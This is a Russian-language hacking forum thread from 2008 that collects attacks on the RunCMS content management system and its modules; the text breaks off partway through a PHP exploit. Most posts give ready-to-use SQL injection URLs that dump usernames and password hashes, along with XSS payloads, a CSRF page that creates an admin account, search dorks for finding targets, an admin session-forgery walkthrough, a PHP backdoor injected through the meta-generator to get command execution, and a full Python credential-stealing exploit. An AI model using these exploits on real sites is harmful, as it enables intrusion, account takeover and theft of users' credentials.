[ Обзор уязвимостей RunCMS ]

Discussion in 'Веб-уязвимости' started by Solide Snake, 20 Jan 2008.

  1. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    Обзор уязвимостей RunCMS


    Сайт производителя: www.runcms.org
    Актуальная версия: 1.6.1


    Exploits


    Цель: RunCMS <= 1.2
    Воздействие: Выполнение произвольных команд
    RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit

    Цель: RunCms 1.5.2 и более ранние версии
    Воздействие: SQL-инъекция
    RunCms <= 1.5.2 (debug_show.php) Remote SQL Injection Exploit

    Цель: RunCMS <= 1.6
    Воздействие: Выполнение произвольных команд
    RunCMS <= 1.6 Local File Inclusion Vulnerability

    Цель: RunCMS 1.6 и более ранние версии
    Воздействие: Выполнение произвольных команд
    RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit

    Цель: RunCMS 1.6
    Воздействие: SQL-инъекция
    RunCMS 1.6 Get Admin Cookie Remote Blind SQL Injection Exploit

    Цель: RunCMS 1.6
    Воздействие: SQL-инъекция
    RunCMS 1.6 Remote Blind SQL Injection Exploit (IDS evasion)

    Цель: RunCMS Newbb_plus 0.92 и более ранние версии
    Воздействие: SQL-инъекция
    RunCMS Newbb_plus <= 0.92 Client IP Remote SQL Injection Exploit


    1. Multiple Blind SQL Injection

    Attacker can inject SQL code in modules:

    Code:
    http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid+DSecRG_INJECTION
    http://[server]/[installdir]/modules/mydownloads/visit.php?lid=2+DSecRG_INJECTION
    http://[server]/[installdir]/modules/mydownloads/ratefile.php?lid=2+DSecRG_INJECTION
    http://[server]/[installdir]/modules/mylinks/ratelink.php?lid=2+DSecRG_INJECTION
    http://[server]/[installdir]/modules/mylinks/modlink.php?lid=2+DSecRG_INJECTION
    http://[server]/[installdir]/modules/mylinks/brokenlink.php?lid=2+DSecRG_INJECTION
    Example:

    This query will return link to download file:

    Code:
    GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=1 HTTP/1.0
    
    This query will return error:

    Code:
    GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.0

    2. Stored XSS

    Vulnerability found in script modules/news/submit.php in post parameter name "subject"


    Example:

    Code:
    POST http://[server]/[installdir]/modules/news/submit.php HTTP/1.0
    
    
    subject=<script>alert("DSecRG_XSS")</script>

    3. Linked XSS vulnerability found in modules/news/index.php, attacker can inject XSS in URL string:

    Example:

    Code:
    http://[server]/[installdir]/modules/news/index.php/"><script>alert('DSecRG_XSS')</script>

    3. This page can be overwritten by PHP injection:

    Code:
    runcms_1.6\modules\sections\cache\intro.php
    runcms_1.6\modules\mylinks\cache\disclaimer.php
    runcms_1.6\modules\mydownloads\cache\disclaimer.php
    runcms_1.6\modules\newbb_plus\cache\disclaimer.php
    runcms_1.6\modules\system\cache\disclaimer.php
    runcms_1.6\modules\system\cache\footer.php
    runcms_1.6\modules\system\cache\header.php
    runcms_1.6\modules\system\cache\maintenance.php

    V. 1.3a5 XSS

    Code:
    http://site.com/public/modules/downloads/ratefile.php?lid={number}">[XSS code]

    RUNCMS 1.5.1 SQL Injection

    Code:
    http://site.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,  7,8,9,10+from+runcms_users+where+uid=2
    //milw0rm.com
     
    #1 Solide Snake, 20 Jan 2008
    Last edited: 20 Jan 2008
    5 people like this.
  2. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Нашел слепую скулю в runcms, начал проверять боян ли, оказалось что скуля была найдена до меня, но на ачате нет, поэтому выкладываю, уязвимость в параметре "bid" сценария "modules/banners/click.php"
    Пример:
    http://www.runcms.de/modules/banners/click.php?op=click&bid=3%20and%20substring(version(),1,1)=4
     
    2 people like this.
  3. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508
    1) RunCMS MyAnnonces SQL Injection(cid)

    Code:
    # AUTHOR : S@BUN
    #
    # HOME 1 : http://www.milw0rm.com/author/1334
    #
    # MA─░L : [email protected]
    #
    ################################################################
    #
    # DORK 1 : allinurl: "modules MyAnnonces index php pa view"
    #
    ################################################################
    EXAMPLE
    XXXXMyAnnonces/index.php?pa=view&cid=[EXPLOiT]
    
    EXPLOIT :
    
    for admin = -9999999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*
    
    for pass = -9999999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*

    2) RunCMS 1.6.1 Multiple XSS and XSRF

    HTML:
    ###################################################################
    RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties           by NBBN
    ###################################################################
    
    [b]
    1) Create Webmaster (admin) XSRF Vulnerability[/b]
    <html><head></head><body onLoad="javascript:document.attack.submit()">
    <form action="http://localhost/xampp/runcms/modules/system/admin.php" 
    method="post" enctype="multipart/form-data" name="r">
    <input type="hidden" name="uname" value="Attacker">
    <input type="hidden" name="name" value="Attacker">
    <input type="hidden" name="email" value="[email protected]">
    <input type="hidden" name="url" value="">
    <input type="hidden" name="user_avatar" value="blank.gif">
    <input type="hidden" name="theme" value="helloween">
    <input type="hidden" name="timezone_offset" value="0">
    <input type="hidden" name="language" value="deutsch">
    <input type="hidden" name="user_icq" value="">
    <input type="hidden" name="user_aim" value="">
    <input type="hidden" name="user_msnm" value="">
    <input type="hidden" name="user_from" value="">
    <input type="hidden" name="user_occ" value="">
    <input type="hidden" name="user_intrest" value="">
    <input type="hidden" name="user_birth%5b2%5D" value="">
    <input type="hidden" name="user_birth%5B1%5D" value="">
    <input type="hidden" name="user_birth%5BO%5D" value="">
    <input type="hidden" name="user_sig" value="">
    <input type="hidden" name="umode" value="flat">
    <input type="hidden" name="uorder" value="1">
    <input type="hidden" name="bio" value="">
    <input type="hidden" name="rank" value="7">
    <input type="hidden" name="pass" value="Password">
    <input type="hidden" name="pass2" value="Password">
    <input type="hidden" name="fct" value="users">
    <input type="hidden" name="op" value="addUser">
    <input type="hidden" name="submit" value="%DCbernehmen">
    
    Also with XSRF an attacker can update the profile of all users. He can change 
    the password etc...
    
    [b]2) Cross-Site Scripting (an attacker can only attack an admin)[/b]
    <html><head></head><body onLoad="javascript:document.r.submit()">
    <form action="http://localhost/xampp/runcms/modules/system/admin.php" 
    method="post" enctype="multipart/form-data" name="r">
    <input type="text" class="text" name="rank_title" size="30" maxlength="50" 
    value="<marquee>Cross-Site Scritping :-("/>
    <input type="hidden" name="fct" value="userrank">
    <input type="hidden" name="op" value="RankForumAdd">
    </form>
    </body>
     
  4. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    RUNCMS 1.6.1

    Добавка комментария
    -----------------------------
    Неправильная обработка BB Code => Active XSS

    Пример:
    Code:
    [*color]</textarea>[COLOR=Red][XSS][/COLOR][/*color]
    Component Partner Sites 1.03 SQL Injection
    (Admin priv)

    Exploit:
    Code:
    modules/partners/admin/index.php?op=edit_partner&id=-1/**/union/**/select/**/1,2,3,4,5,concat(uname,0x3a,pass),7/**/from+runcms_users/**/limit/**/0,1
    Component Web Links 1.02 SQL Injection
    (Admin priv)

    Exploit:
    Code:
    modules/mylinks/admin/index.php?op=modCat&cid=-1/**/union/**/select/**/1,concat(uname,0x3a,pass),3,4/**/from+runcms_users+limit+0,1
    Hashing algorithm
    PHP:
    $pass sha1($username.$pass);
    © ZAMUT
     
    #4 Roba, 13 Mar 2008
    Last edited: 27 Apr 2008
    3 people like this.
  5. b!atnoy

    b!atnoy .::The Mafia::.

    Joined:
    1 Jan 2008
    Messages:
    96
    Likes Received:
    87
    Reputations:
    3
    RunCMS Module section (artid) Remote SQL Injection Vulnerability

    Code:
    Cr@zy_King
    
    [email protected] / hackshow.us
    
    Grtz : Crackers_Child - str0ke - 3php - Alemin_Krali - Eno7 - DreamTurk - The_Bekir - Mhzr91
    
    Runcms Module Section (artid) Remote Sql İnj. Vuln.
    
    Example :
    
     - modules/sections/index.php?op=viewarticle&artid=Sql
    
     - Sql : 1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    
    Cr@ Says : Kurtlar Vadisinde Memati Ölmeyecek kimse heyecanlanmasın :D
    
    Alemin_Krali Says : Aynen katılıyorum (ne alaka ise a.q)
    
    Good.
    
    # milw0rm.com [2008-03-20]
     
    2 people like this.
  6. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability

    SQL Injection

    Vulnerable: Module Photo 3.02

    Exploit:
    Code:
    admin
    
    modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*
    
    pass
    
    modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
    
    Dork:
    Code:
    allinurl: "modules/photo/viewcat.php?id"
    inurl:photo "powered by runcms"
    
    © S@BUN
     
  7. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    RunCMS Module nGuestBook 1.01 Active XSS

    Add message => Message => [XSS]

    dork: inurl:/modules/nguestbook/


    SQL Injection

    Vulnerable: Module Photo 4.00


    Vuln code:
    PHP:
    .....
    include_once(
    PHOTO_PATH."/class/bama_cat.php");
    $id $HTTP_GET_VARS['id'];
    if (isset(
    $HTTP_GET_VARS['cid'])) {
    .....
    Exploit:
    Code:
    http://site.com/modules/photo/rateimg.php?id=-999999+union+select+pass+from+runcms_users+where+uid=1
    ZAMUT (c)
     
    #7 Roba, 26 Apr 2008
    Last edited: 29 Apr 2008
    3 people like this.
  8. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    RunCMS Module MyArticles 0.0.4-0.5 sql-inj

    Sql-inj в параметре topic_id, GET фильтруется, поэтому данные нужно посылать POST-ом
    Code:
    http://mobilefree.ru/modules/myarticles/topics.php?op=listarticles&topic_id=-2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users
    © H00k
     
    3 people like this.
  9. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    RunCMS Module MyArticles 0.6 Beta-1 SQL Injection Vulnerability

    SQL Injection

    http://localhost/modules/myarticles/topics.php?op=listarticles&topic_id=[SQL]

    Code:
    -2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users
    milw0rm.com
     
    1 person likes this.
  10. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    RunCMS Module HotNews 2.00 (tid) Remote SQL Injection Vulnerability

    Vuln code:
    PHP:
    .....
    include(
    XOOPS_ROOT_PATH."/header.php");
    $tid $HTTP_GET_VARS['tid'];
    if (
    $HTTP_GET_VARS['page']) {
       
    $page $HTTP_GET_VARS['page'];
    .....
    Exploit:
    Code:
    /modules/HotNews/index.php?op=printpage&tid=-9997+union+select+1,2,pass,4+from+runcms_users
    
    Example:
    Code:
    http://www.segacfecgc.info/modules/HotNews/index.php?op=printpage&tid=-9997+union+select+1,2,pass,4+from+runcms_users
    
    dork: /modules/HotNews/


    ZAMUT(c)
     
    #10 Roba, 28 Apr 2008
    Last edited: 28 Apr 2008
    4 people like this.
  11. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Способ если прокатила скуля и нет возможности сбрутить хеш!

    1. Регаем акк на сайте (жертва)

    2. В моем случае проведенная скуль имела вид
    Code:
    modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,hash,4,5,uname,7,8,9,10+from+runcms_session+where+uid=3
    Таким макаром выводим hash-session админа (не забываем про id)!
    Вывело что-то в этом роде eb5cafcd8afa7edf125edfa35c55c73e425bd1d0

    3. Логонимся под реганым акком, смотрим наши куки

    Примерно вот такой вид:
    Code:
    a%3A3%3A%7Bi%3A0%3Bs%3A5%3A%2220001%22%3Bi%3A1%3Bs%3A40%3A%22e2ef357450c7c647fa5c813808d1500273407483%22%3Bi%3A2%3Bi%3A1212184753%
    наш id = 20001
    и сессия = e2ef357450c7c647fa5c813808d1500273407483

    4. Меняем на id админа (в моем случае id = 00003) и сессия = eb5cafcd8afa7edf125edfa35c55c73e425bd1d0

    Получаем след.:
    Code:
    a%3A3%3A%7Bi%3A0%3Bs%3A5%3A%2200003%22%3Bi%3A1%3Bs%3A40%3A%22e2ef357450c7c647fa5c813808d1500273407483%22%3Bi%3A2%3Bi%3A1212184753%3B%7D
    Менял куки через плагин в лисе ставил галку напротив Session cookies и обновлял страницу .

    И мы в админке.

    Спасибо за внимание!
     
  12. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    RunCMS Module Reviews 2.00 (lid) Remote SQL Injection Vulnerability

    Vuln code:
    PHP:
    .....
    global 
    $xoopsConfig$db$HTTP_POST_VARS$myts$eh;
    $lid $HTTP_POST_VARS['lid'];
    $title $HTTP_POST_VARS['title'];
    .....
    Exploit:
    Code:
    /modules/myReviews/reviewbook.php?lid=-999991+union+select+pass+from+runcms_users
    ZAMUT (c)
     
    2 people like this.
  13. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    RunCMS Module Arcade 1.28 (gid) Remote SQL Injection Vulnerability

    Vuln code:
    PHP:
     global $HTTP_POST_VARS$HTTP_GET_VARS$myts;

        
    $commit = isset($HTTP_POST_VARS['commit']) ? $HTTP_POST_VARS['commit'] : $HTTP_GET_VARS['commit'];
        
    $gid = isset($HTTP_POST_VARS['gid']) ? $HTTP_POST_VARS['gid'] : $HTTP_GET_VARS['gid'];
    Exploit:
    Code:
    /index.php?act=play_game&gid=-999999+union+select+1,2,3,4,pass,6,7,8,9,10,11,12,13,14+from+runcms_users
    ZAMUT(c)
     
    1 person likes this.
  14. b!atnoy

    b!atnoy .::The Mafia::.

    Joined:
    1 Jan 2008
    Messages:
    96
    Likes Received:
    87
    Reputations:
    3
    RunCMS <= 1.6.1 (msg_image) SQL Injection Exploit

    Code:
    #!/usr/bin/python
    """
    #=================================================================================================#
    #                     ____            __________         __             ____  __                  #
    #                    /_   | ____     |__\_____  \  _____/  |_          /_   |/  |_                #
    #                     |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\               #
    #                     |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |                 #
    #                     |___|___|  /\__|  /______  /\___  >__|            |___||__|                 #
    #                              \/\______|      \/     \/                                          #
    #=================================================================================================#
    #                                     This is a public Exploit                                    #
    #=================================================================================================#
    #  	           		           Runcms <= 1.6.1                                        #
    #                                    Sql Injection Vulnerability                                  #
    #                                         Benchmark Method                                        #
    #=================================================================================================#
    #                                .-= In memory of our friend rGod =-.                        	  #
    #====================================#===========#====================================#===========#
    # Server Configuration Requirements  #           # Some Information                   #           #
    #====================================#		 #====================================#           #
    #                                                #                                                #
    # magic_quotes_gpc = 0                           #  Vendor:   runcms.org	                  #
    #                                                #  Author:   The:Paradox                         #
    #================================================#  Severity: Moderately Critical                 #
    #                                                #                                                #
    # Uff... I have to find something to put here... #  Proud To Be Italian.                          #
    #                                                #                                                #
    #====================================#===========#================================================#
    # Proof Of Concept / Bug Explanation #                                                            #
    #====================================#                                                            #
    #												  #
    # This time i'm really too lazy to write a long PoC.						  #
    # $msg_image (but also $msg_attachment) is unproperly checked when calling store()	          #
    # function (modules/messages/class/pm.class.php) 						  #
    # Sql injection in insert syntax (whatever I am not using blind attack). Prefix knowledge needed. #
    #												  #
    #=================================================================================================#
    
    [modules/messages/class/pm.class.php]
    
    
    64. 	function store() {
    
    65.	global $db, $upload;
    
    66.
    67.	if ( !$this->isCleaned() ) {
    
    68.		if ( !$this->cleanVars() ) {
    
    69.			return false;
    
    70.		}
    
    71.	}
    
    72.	
    
    73.	foreach ( $this->cleanVars as $k=>$v ) {
    
    74.		$$k = $v;
    
    75.	}
    
    76.	
    
    77.	if ( empty($msg_id) ) {
    
    78.	
    
    79.		$msg_id = $db->genId($db->prefix('private_msgs').'_msg_id_seq');
    80.		
    81.		$sql = "
    
    82.			INSERT INTO ".$db->prefix("private_msgs")." SET
    
    83.			msg_id=".intval($msg_id).",
    
    84.			msg_image='$msg_image',
    
    85.			msg_attachment='$msg_attachment',
    
    86.			subject='$subject',
    
    87.			from_userid=".intval($from_userid).",
    
    88.			to_userid=".intval($to_userid).",
    
    89.			msg_time=".time().",
    
    90.			msg_text='$msg_text',
    
    91.			read_msg=0,
    
    92.			type='".$type."',
    
    93.			allow_html=".intval($allow_html).",
    
    94.			allow_smileys=".intval($allow_smileys).",
    
    95.			allow_bbcode=".intval($allow_bbcode).",
    
    96.			msg_replay=".intval($msg_replay)."";
    
    97.	}
    
    98.
    99.	if ( !$result = $db->query($sql) ) {
    
    100.		$this->errors[] = _NOTUPDATED;
    
    101.		return false;
    
    102.	}
    
    103.
    104.	return true;
    
    105.	}
    												  
    #=================================================================================================#
    # There are other vulnerabilities in this CMS. Find them by yourself. 		                  #
    #=================================================================================================#
    # Use this at your own risk. You are responsible for your own deeds.                              #
    #=================================================================================================#
    #                                      Python Exploit Starts                                      #
    #=================================================================================================#
    """
    
    import urllib, urllib2
    from sys import argv, exit
    
    
    main = """
    #================================================================#
    #  	                  Runcms <= 1.6.1                        #
    #                   Sql Injection Vulnerability                  #
    #                     Discovered By The:Paradox                  #
    #                                                                #
    #                 rGod is still alive in our hearts              #
    #                                                                #
    # Usage:                                                         #
    #  ./homerun [Target+path] [TargetUid] [ValidUserCookie]         #
    #  ./homerun --help (to print an example)                        #
    #================================================================#
    """
    
    prefix = "runcms_"
    
    if len(argv)>=2 and argv[1] == "--help": 
    	print "\nuser@linux:~/Desktop$ ./homerun http://localhost/web/runcms/ 1 rc_sess=a%3A3%3A%7Bi%3A0%3Bi%3A3%3Bi%3A1%3Bs%3A40%3A%228b394462d67198707aea362098001610d35687ff%22%3Bi%3A2%3Bi%3A1212933002%3B%7D;\n\n" + main + "\n\n[.] Exploit Starting.\n[+] Sending HTTP Request...\n[+] A message with username and password of user with id 1 has been sent to user with id 3.\n -= The:Paradox =-"
    else: print main
    
    
    if len(argv)<=3:	exit()
    else:   print "[.] Exploit Starting."
    
    
    host = argv[1]
    tuid = argv[2]
    cookie = argv[3]
    try: uid = cookie.split("a%3A3%3A%7Bi%3A0%3Bi%3A")[1].split("%3Bi%3A1%3Bs%3A40%3A%")[0]
    except: exit("[-] Invalid cookie")
    sql = "icon12.gif', msg_attachment='', subject='Master, all was done.', from_userid=" + str(uid) + ", to_userid=" + str(uid) + ", msg_time=0, msg_text=concat('Master, password hash for ',(select uname from " + prefix + "users where uid=" + tuid + "),' is ',(select pass from " + prefix + "users where uid=" + tuid + ")), read_msg=0, type='1', allow_html=0, allow_smileys=1, allow_bbcode=1, msg_replay=0/*"
    
    
    print "[+] Sending HTTP Request..."
    values = {'subject' : 'Master attack failed.',
    	  'message' : 'Probably mq = 1 or system patched.',
    	  'allow_html' : 0,
    	  'allow_smileys' : 1,
    	  'allow_bbcode' : 0,
    	  'msg_replay' : 1,
              'submit' : '1',
    	  'msg_image' : sql,
              'to_userid' : uid }
    headers = {'Cookie' : cookie, 
    	   'Content-Type' : 'application/x-www-form-urlencoded'}
    req = urllib2.Request(host + "/modules/messages/pmlite.php", urllib.urlencode(values), headers)
    response = urllib2.urlopen(req)
    
    
    if response.read().find('Your message has been posted.') != -1: print "[+] A message with username and password of user with id " + tuid + " has been sent to user with id " + uid + ".\n -= The:Paradox =-"
    else: print "[-] Unable to send message"
    
    # milw0rm.com [2008-05-08]
     
  15. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    в админке

    Читалка (все версии).
    конфиг к бд
    Code:
    http://localhost/runcms/class/debug/highlight.php?file=../../mainfile.php
    можно троянить все странички cms:
    Тут радактируем хидер либо футер, как нам нужно, я вставлял ифр :)
    Code:
    http://localhost/runcms/modules/system/admin.php?fct=meta-generator
    ну и хз за чем они нужны, но пусть будут. SQL-inj.

    Code:
    /modules/system/admin.php?fct=smilies&op=SmilesEdit&id=-1+union+select+1,pass,3,4+from+runcms_users
    /modules/system/admin.php?fct=userrank&op=RankForumEdit&rank_id=-1+union+select+1,pass,3,4,5,6+from+runcms_users
    ZAMUT (c)
     
    #15 Roba, 19 May 2008
    Last edited: 19 May 2008
  16. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Заливка шелла в RunCMS

    Заливка шелла в RunCMS
    через Meta-Generator

    Уязвимый кусок кода:
    Code:
    .......
    $content .= "\$meta['follow'] = \"".$_POST["Xfollow"]."\";\n";
    $content .= "\$meta['pragma'] = \"".$_POST["Xpragma"]."\";\n";
    $content .= "\$meta['icon'] = \"".$_POST["Xicon"]."\";\n";
    .......
    write_file("meta", $content, "w");
    
    Идем в:
    Code:
    http://localhost/runc/modules/system/admin.php?fct=meta-generator
    поле Bookmark Icon имеет вид:
    Code:
    ../../favicon.ico
    правим так:
    Code:
    ../../favicon.ico";echo `$_REQUEST[c]`;#
    теперь файл с этой опцией (\modules\system\cache\meta.php) выглядит так:
    Code:
            ......... 
     $meta['rating'] = "general";
     $meta['p3p'] = "";
     $meta['index'] = "index";
     $meta['follow'] = "follow";
     $meta['pragma'] = "";
     $meta['icon'] = "../../favicon.ico";echo `$_REQUEST[c]`;#";
            .........
    
    Т.е. классический php-injection, как видим теперь все зависит от нашей фантазии :)

    используем так:

    Code:
    http://localhost/runc/modules/system/admin.php?fct=meta-generator&c=dir
    Имхо, метод вообще безпалевный (когда юзать будем POST) ;)

    Так же, как вариант, можно инклудить смайл/аватарку с добавленным в нее php-кодом (после заливки лежать она будет тут ../../images/smilies/smile.gif )


    ZAMUT (c)
     
    #16 Roba, 5 Jun 2008
    Last edited: 27 Nov 2008
  17. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials disclosure ex

    RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials disclosure exploit

    PHP:
    <?php
    print_r
    ('
    --------------------------------------------------------------------------
    RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials
    disclosure exploit
    by rgod
    mail: retrog at alice dot it
    site: http://retrogod.altervista.org

    dork: "Runcms Copyright" "2002 - 2007" +"page created"
    ---------------------------------------------------------------------------
    '
    );

    /*
    software site: http://www.runcms.org/modules/news/

    vulnerable code in /class/debug/debug_show.php:
    <?php
    ...

    include_once("../../mainfile.php");
    include_once("../../header.php");

    switch($_POST['debug_show']) {
      case "show_files":
        show_files($_POST['loaded_files']);
        break;

      case "show_queries":
        show_queries($_POST['executed_queries'], $_POST['sorted']);
        break;
    }

    include_once("../../footer.php");
    ?>

    no authentication is performed to run show_files() and show_queries()
    functions, look at this now in /class/debug/debug.php:

    ...
    function show_queries($executed_queries, $sorted=0)
    {
       global $db;

       $executed_queries = unserialize(urldecode($executed_queries));

       if ($sorted == 1)
       {
          sort($executed_queries);
          $is_sorted = _DBG_SORTEDR;
       }
       else
       {
          array_reverse($executed_queries);
          $is_sorted = _DBG_NSORTEDR;
       }

       OpenTable();

       $fulldebug = "
        <h4>($is_sorted) "._DBG_QEXECED.": ".count($executed_queries)."</h4>
        <table width='100%' cellpadding='3' cellspacing='1'>";

       $size = count($executed_queries);

       for ($i=0; $i<$size; $i++)
       {
          $stime = get_micro_time();

          $query      = $db->query("EXPLAIN ".$executed_queries[$i]."");
          $querytime  = (get_micro_time() - $stime);
          $totaltime += $querytime;

          $fulldebug .= "<tr>
                            <td nowrap='nowrap' class='bg2'><b>"._DBG_QUERY.": ".($i+1)."</b></td>
                            <td colspan='7' class='bg3'>$executed_queries[$i]</td>
                            </tr><tr>
                            <td nowrap='nowrap' class='bg2'><b>"._DBG_TIME.":</b></td>
                            <td colspan='7' class='bg3'>".round($querytime, 4)." "._DBG_SECONDS."</td>
                            </tr><tr>
                            <td nowrap='nowrap' class='bg2'><b>"._DBG_TABLE.":</b></td>
                            <td nowrap='nowrap' class='bg2'><b>"._DBG_TYPE.":</b></td>
                            <td nowrap='nowrap' class='bg2'><b>"._DBG_POSSKEYS.":</b></td>
                            <td nowrap='nowrap' class='bg2'><b>"._DBG_KEY.":</b></td>
                            <td nowrap='nowrap' class='bg2'><b>"._DBG_KEYLEN.":</b></td>
                            <td nowrap='nowrap' class='bg2'><b>ref:</b></td>
                            <td nowrap='nowrap' class='bg2'><b>"._DBG_ROWS.":</b></td>
                            <td nowrap='nowrap' class='bg2'><b>"._DBG_EXTRA.":</b></td>
                            </tr>";

          while ($result = $db->fetch_array($query))
          {
             $fulldebug .= " <tr>
                            <td class='bg3' nowrap='nowrap' {$result['table']}&nbsp;</td>
                            <td class='bg3' nowrap='nowrap' {$result['type']}&nbsp;</td>
                            <td class='bg3'>{$result['possible_keys']}&nbsp;</td>
                            <td class='bg3' nowrap='nowrap' {$result['key']}&nbsp;</td>
                            <td class='bg3' nowrap='nowrap' {$result['key_len']}&nbsp;</td>
                            <td class='bg3' nowrap='nowrap' {$result['ref']}&nbsp;</td>
                            <td class='bg3' nowrap='nowrap' {$result['rows']}&nbsp;</td>
                            <td class='bg3'>{$result['Extra']}&nbsp;</td>
                            </tr>";
          }
          $fulldebug .= "<tr>
                            <td colspan='8' class='bg1'>"._DBG_CUMULATED.":".round($totaltime, 4)." "._DBG_SECONDS."<hr noshade></td>
                            </tr>";
       }

       $fulldebug .= "</table>";

       echo $fulldebug;
       CloseTable();
    }
    ...

    we have a nice kind of sql injection here!

    also show_files function can be used to check the existence of certain files
    and retrieve the filesize or if it has been modified and so on...


    */

    if ($argc<3) {
        
    print_r('
    ---------------------------------------------------------------------------
    Usage: php '
    .$argv[0].' host path OPTIONS
    host:      target server (ip/hostname)
    path:      path to runcms

    Options:
     -p[port]:    specify a port other than 80
     -P[ip:port]:    ""   a proxy
     -T[prefix]      ""   a table prefix (default: runcms)
    Example:
    php '
    .$argv[0].' localhost /runcms/ -P1.1.1.1:80
    php '
    .$argv[0].' localhost / -Trcms -p81
    ---------------------------------------------------------------------------
    '
    );
        die;
    }

    error_reporting(7);
    ini_set("max_execution_time",0);
    ini_set("default_socket_timeout",5);

    function 
    quick_dump($string)
    {
      
    $result='';$exa='';$cont=0;
      for (
    $i=0$i<=strlen($string)-1$i++)
      {
       if ((
    ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
       {
    $result.="  .";}
       else
       {
    $result.="  ".$string[$i];}
       if (
    strlen(dechex(ord($string[$i])))==2)
       {
    $exa.=" ".dechex(ord($string[$i]));}
       else
       {
    $exa.=" 0".dechex(ord($string[$i]));}
       
    $cont++;if ($cont==15) {$cont=0$result.="\r\n"$exa.="\r\n";}
      }
     return 
    $exa."\r\n".$result;
    }
    $proxy_regex '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

    function 
    send($packet)
    {
      global 
    $proxy$host$port$html$proxy_regex;
      if (
    $proxy=='') {
        
    $ock=fsockopen(gethostbyname($host),$port);
        if (!
    $ock) {
          echo 
    'No response from '.$host.':'.$port; die;
        }
      }
      else {
            
    $c preg_match($proxy_regex,$proxy);
        if (!
    $c) {
          echo 
    'Not a valid proxy...';die;
        }
        
    $parts=explode(':',$proxy);
        
    $parts[1]=(int)$parts[1];
        echo 
    "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
        
    $ock=fsockopen($parts[0],$parts[1]);
        if (!
    $ock) {
          echo 
    'No response from proxy...';die;
            }
      }
      
    fputs($ock,$packet);
      if (
    $proxy=='') {
        
    $html='';
        while (!
    feof($ock)) {
          
    $html.=fgets($ock);
        }
      }
      else {
        
    $html='';
        while ((!
    feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
          
    $html.=fread($ock,1);
        }
      }
      
    fclose($ock);
    }

    $host=$argv[1];
    $path=$argv[2];
    $port=80;
    $proxy="";
    $prefix="runcms";

    for (
    $i=3$i<$argc$i++){
    $temp=$argv[$i][0].$argv[$i][1];
    if (
    $temp=="-p")
    {
      
    $port=(int)str_replace("-p","",$argv[$i]);
    }
    if (
    $temp=="-P")
    {
      
    $proxy=str_replace("-P","",$argv[$i]);
    }
    if (
    $temp=="-T")
    {
      
    $prefix=str_replace("-T","",$argv[$i]);
    }
    }
    if ((
    $path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
    if (
    $proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

    $md5s[0]=0;//null
    $md5s=array_merge($md5s,range(48,57)); //numbers
    $md5s=array_merge($md5s,range(97,102));//a-f letters
    //print_r(array_values($md5s));
    echo "md5 hash -> ";
    $j=1;$password="";
    while (!
    strstr($password,chr(0))){
        for (
    $i=0$i<=255$i++){
            if (
    in_array($i,$md5s)){
                
    $executed_queries=array();
                
    //original query: EXPLAIN ...
                
